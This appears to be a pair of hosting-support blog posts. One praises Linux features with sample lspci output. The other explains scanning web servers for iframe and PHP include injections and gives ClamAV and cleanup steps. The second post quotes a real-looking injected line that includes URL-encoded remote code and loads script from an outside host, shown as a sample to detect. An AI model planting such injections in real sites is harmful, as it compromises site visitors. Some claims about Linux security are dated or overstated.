In Linux we have got the freedom to study how the program works, and adapt it according to our needs. Access to the source code is a precondition for this, which is allowed in Linux.

Freedom 2 – The freedom to redistribute the copies.
We can distribute our copy of linux through dvd’s, pen-drives etc, so that we can help our neighbor & fellow human beings.

Freedom 3 – The freedom to improve the program.
Since we have the access to the source code, we can modify it and release our improvements to the public, so that the whole community benefits.

A program is free software if users have all of these freedoms.

And for a desktop user, most importantly, the freedom from viruses, as long as you use the software downloaded from the software repository of your OS

Multi-User Environment:-

Linux supports multi-user enviornment, ie several users are allowed to login to the same system with different permissions.

Potability :-

Linux is portable. It is possible to reuse the existing code instead of creating new code when moving software from an environment to another. The portability is the key issue for development cost reduction.

Intimate knowledge of the hardware :-

Noting better than Linux to know your machine’s hardware information. A detailed information could be seen using a command ‘lspci’.(use option -vvv for more detailed info)

supportsage@supportsage-desktop:~$ lspci
00:00.0 Host bridge: VIA Technologies, Inc. K8M800 Host Bridge
00:00.1 Host bridge: VIA Technologies, Inc. K8M800 Host Bridge
00:00.2 Host bridge: VIA Technologies, Inc. K8M800 Host Bridge
00:00.3 Host bridge: VIA Technologies, Inc. K8M800 Host Bridge
00:00.4 Host bridge: VIA Technologies, Inc. K8M800 Host Bridge
00:00.7 Host bridge: VIA Technologies, Inc. K8M800 Host Bridge
00:01.0 PCI bridge: VIA Technologies, Inc. VT8237 PCI bridge [K8T800/K8T890 South]
00:0f.0 IDE interface: VIA Technologies, Inc. VIA VT6420 SATA RAID Controller (rev 80)
00:0f.1 IDE interface: VIA Technologies, Inc. VT82C586A/B/VT82C686/A/B/VT823x/A/C PIPC Bus Master IDE (rev 06)
00:10.0 USB Controller: VIA Technologies, Inc. VT82xxxxx UHCI USB 1.1 Controller (rev 81)
00:10.1 USB Controller: VIA Technologies, Inc. VT82xxxxx UHCI USB 1.1 Controller (rev 81)
00:10.2 USB Controller: VIA Technologies, Inc. VT82xxxxx UHCI USB 1.1 Controller (rev 81)
00:10.3 USB Controller: VIA Technologies, Inc. VT82xxxxx UHCI USB 1.1 Controller (rev 81)
00:10.4 USB Controller: VIA Technologies, Inc. USB 2.0 (rev 86)
00:11.0 ISA bridge: VIA Technologies, Inc. VT8237 ISA bridge [KT600/K8T800/K8T890 South]
00:11.5 Multimedia audio controller: VIA Technologies, Inc. VT8233/A/8235/8237 AC97 Audio Controller (rev 60)
00:12.0 Ethernet controller: VIA Technologies, Inc. VT6102 [Rhine-II] (rev 78)
00:18.0 Host bridge: Advanced Micro Devices [AMD] K8 [Athlon64/Opteron] HyperTransport Technology Configuration
00:18.1 Host bridge: Advanced Micro Devices [AMD] K8 [Athlon64/Opteron] Address Map
00:18.2 Host bridge: Advanced Micro Devices [AMD] K8 [Athlon64/Opteron] DRAM Controller
00:18.3 Host bridge: Advanced Micro Devices [AMD] K8 [Athlon64/Opteron] Miscellaneous Control
01:00.0 VGA compatible controller: VIA Technologies, Inc. S3 Unichrome Pro VGA Adapter (rev 01)

An example for more detailed hardware information is given below.

supportsage@supportsage-desktop:~$ lspci -vvv
00:00.0 Host bridge: VIA Technologies, Inc. K8M800 Host Bridge
Subsystem: VIA Technologies, Inc. K8M800 Host Bridge
Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B-
Status: Cap+ 66MHz+ UDF- FastB2B- ParErr- DEVSEL=medium >TAbort- SERR- Latency: 8
Region 0: Memory at e8000000 (32-bit, prefetchable) [size=128M]
Capabilities:

No BSOD – Blue Screen of Death :-

The BSOD is a colloquialism used for the error screen displayed by some other operating systems. And a Linux based system is free from this.

Upgradeability :-

The Linux systems could be upgraded quite easily, with the help of on-line repositories. Upgradation is possible without any changes in the system configuration and saved data’s.

Customization :-

Linux machine can be easily customised accourding to the user expectations. I leave , how to customise Linux to your imagination.

Security – viruses, worms and trojans :-

Linux machines are well known for its security. 65% of the server are running on Linux based machines. Linux machines are very less infected by viruses, worms and trojans.

Maturity – Stable, Reliable and Extremely powerful :-

Another fine reason for using server’s based on Linux is its ‘stability’ & ‘reliability’. No reboot is needed, except for kernel upgrades. OS like windows XP need a reboot, even a new application software is installed.

Support :-

You can get support for Linux from millions of forums, live IRC’s and even from your local LUG(Linux User Group). All are there to help you

Complete development environment :-

A C compiler for Windows alone would set you back hundreds of dollars. Whereas in Linux, most of the development libraries like gcc, perl, python, javac etc comes built-in.

Tweet This Post

How to do virus scan on Linux servers ?

George — Tue, 21 Apr 2009 12:09:42 +0000

Do you really need to do virus scan on Linux servers ? Sometimes yes. With the recent high level of iframe/php include/js injections, it seems we need to scan the pages for iframe injections, like below

< ? php include(urldecode("%68%74%74%70%3a%2f%2f%62%75%79%34%6d%65%2e%69%6e%66%6f%2f%73%63%72%2f%31%30%2e%74%78%74")); ? > < iframe src=http://ms.nesseseni.cn/src.js >< /iframe >

Below are a few URLs which could help you in the process

http://www.google.com/safebrowsing/diagnostic?site=http://supportsages.com
http://www.malwaredomains.com/
http://www.malwaredomainlist.com/mdl.php – A regularly updated list.

You can install clamav antivirus which is open source and do a clamav scan to make sure that the website is not affected. On a cPanel server, the below command will scan the entire website files of each users.

clamscan -i -r –remove /home/*/public_html/

Why would I recommend clamav over other paid antivirus ? For obvious reasons that you can edit ClamAV rules to include more iframe detection rules. Just write a new regex rules in the clamav virus DBs and you have the situation under control, at least for those matching iframe codes.

Other solution would be mod_security 2.5 that could help preventing the page alteration using SQL injection and javascript injection and threats detailed in http://www.gnucitizen.org/blog/atom-2/

Here I was talking about server security. Once infected, there are a few things client has to do as well.

1. Scan your machine as well as your webmaster’ with anti-virus and anti-spyware tools.
2. Once you are sure your computer is clean, change all site passwords. (You might want to change computer and network passwords too.)
3. Now keep the new passwords secure. Don’t use auto-upload features of your WYSIWYG editors or in your FTP browsers. Enter passwords every time you upload new content instead. Use SFTP instead of FTP if possible. Only a few hosts offer sftp though.
4. If your site was flagged by Google at http://www.google.com/safebrowsing/diagnostic , request a malware review via Webmaster Tools.
5. Regularly check your site with diagnostics tools of your choice (like Unmask Parasites ) to be sure your site is clean.

Tweet This Post